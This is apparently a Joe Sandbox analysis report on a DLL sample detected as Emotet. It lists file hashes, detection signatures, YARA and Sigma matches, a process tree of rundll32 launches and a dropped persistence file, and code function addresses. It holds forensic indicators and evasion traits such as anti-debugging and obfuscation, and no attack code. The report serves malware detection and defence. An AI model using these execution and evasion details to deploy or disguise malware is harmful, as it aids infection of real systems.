Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nhlHEF5IVY.dll

Overview

General Information

Sample Name:nhlHEF5IVY.dll
Analysis ID:532437
MD5:222719bd9555a8f48428737ab34a6fa6
SHA1:b56136e6d1460055917dcb74ed849c59b35300c0
SHA256:81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Emotet
Sigma detected: Emotet RunDLL32 Process Creation
Multi AV Scanner detection for submitted file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Deletes files inside the Windows folder
Drops PE files to the windows directory (C:\Windows)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Checks if the current process is being debugged
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4612 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 3792 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5228 cmdline: rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5104 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3112 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 3080 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg",APfz MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5824 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3000 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 3484 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4804 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5356 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 3880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 336 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6032 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4612 -ip 4612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000002.993619798.00000000005BB000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.loaddll32.exe.1c0000.6.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              0.0.loaddll32.exe.1c0000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0.0.loaddll32.exe.5d3908.4.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  0.0.loaddll32.exe.5d3908.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    5.2.rundll32.exe.32c2240.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 71 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg",APfz, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3080, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL, ProcessId: 5824

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: nhlHEF5IVY.dllVirustotal: Detection: 21%Perma Link
                      Source: nhlHEF5IVY.dllReversingLabs: Detection: 18%
                      Source: nhlHEF5IVY.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: nhlHEF5IVY.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952942912.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952718698.00000000010F7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953141393.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.952949030.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953289647.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953145712.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.952949030.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953289647.0000000000BA8000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953145712.0000000000BA8000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953383298.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952935685.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.952942912.0000000000BA2000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.953141393.0000000000BA2000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.961082404.00000000004D2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.955080145.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.978011043.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.953383298.0000000000B9C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.952935685.0000000000B9C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0927 FindFirstFileExW,0_2_6E4C0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4C0927 FindFirstFileExW,2_2_6E4C0927
                      Source: WerFault.exe, 0000000E.00000003.990205890.0000000001164000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.990231271.0000000001174000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.992030665.0000000001175000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.32c2240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.8e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9434a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3753718.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3753718.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.5d3908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.8e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.32c2240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.5d3908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3732240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.5d3908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3732240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9434a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.993619798.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.948659088.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.947178520.00000000032AA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.969710134.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1048939362.000000000373A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.930138580.0000000000750000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.946894712.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.946802756.000000000371A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.948115797.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.899666067.0000000000B2B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.969859357.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.970456137.00000000005BB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.946627209.00000000001C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.936268035.000000000092A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.933922652.00000000008E0000.00000040.00000010.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: nhlHEF5IVY.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Rxalrmpxe\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001E12910_2_001E1291
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001E261E0_2_001E261E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C800A0_2_001C800A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DC2050_2_001DC205
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C243F0_2_001C243F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C34320_2_001C3432
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D282D0_2_001D282D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C32280_2_001C3228
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C98240_2_001C9824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CCE5A0_2_001CCE5A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DEA550_2_001DEA55
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C64530_2_001C6453
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C544C0_2_001C544C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CAA4E0_2_001CAA4E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D74450_2_001D7445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D30430_2_001D3043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CAE430_2_001CAE43
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C387F0_2_001C387F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CFA780_2_001CFA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DB6770_2_001DB677
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C3A6C0_2_001C3A6C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C68690_2_001C6869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CB4640_2_001CB464
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CEE600_2_001CEE60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CFE9D0_2_001CFE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DE8990_2_001DE899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DA29B0_2_001DA29B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D009A0_2_001D009A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D0E970_2_001D0E97
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DCE900_2_001DCE90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D0A930_2_001D0A93
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CF48A0_2_001CF48A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CA0830_2_001CA083
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001E1CDB0_2_001E1CDB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C90D40_2_001C90D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D28D50_2_001D28D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D52D10_2_001D52D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001E20CE0_2_001E20CE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D10CD0_2_001D10CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C92C10_2_001C92C1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C2CC20_2_001C2CC2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D40FE0_2_001D40FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C46FA0_2_001C46FA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C1EFB0_2_001C1EFB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D62F50_2_001D62F5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D4CF50_2_001D4CF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C84F00_2_001C84F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D56E90_2_001D56E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CC0EA0_2_001CC0EA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C4D1E0_2_001C4D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CCB130_2_001CCB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D3D0C0_2_001D3D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DBF0C0_2_001DBF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D590E0_2_001D590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D970A0_2_001D970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DE10A0_2_001DE10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CF73B0_2_001CF73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DCD350_2_001DCD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CA92F0_2_001CA92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D91240_2_001D9124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D65400_2_001D6540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001E03700_2_001E0370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CCF6E0_2_001CCF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CBD610_2_001CBD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C77950_2_001C7795
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D15910_2_001D1591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CB1910_2_001CB191
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C358B0_2_001C358B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DDB870_2_001DDB87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C8D800_2_001C8D80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C4B810_2_001C4B81
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D37820_2_001D3782
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C43BE0_2_001C43BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C59BF0_2_001C59BF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DD7BE0_2_001DD7BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D85B80_2_001D85B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DE3B50_2_001DE3B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DDDA50_2_001DDDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D0BA40_2_001D0BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DE5A70_2_001DE5A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D89A20_2_001D89A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C75D20_2_001C75D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C19C00_2_001C19C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DEDED0_2_001DEDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001C51EC0_2_001C51EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001CA3E70_2_001CA3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A9F100_2_6E4A9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A77B40_2_6E4A77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AD5300_2_6E4AD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A1DE00_2_6E4A1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A3A900_2_6E4A3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B03800_2_6E4B0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BE3A10_2_6E4BE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A60700_2_6E4A6070
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B10C00_2_6E4B10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AA8900_2_6E4AA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE8900_2_6E4AE890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A68B00_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A9F102_2_6E4A9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A77B42_2_6E4A77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4AD5302_2_6E4AD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A1DE02_2_6E4A1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A3A902_2_6E4A3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4B03802_2_6E4B0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4BE3A12_2_6E4BE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A60702_2_6E4A6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4B10C02_2_6E4B10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4AA8902_2_6E4AA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4AE8902_2_6E4AE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E4A68B02_2_6E4A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031BEA554_2_031BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031C12914_2_031C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031A4D1E4_2_031A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031ACB134_2_031ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031B970A4_2_031B970A
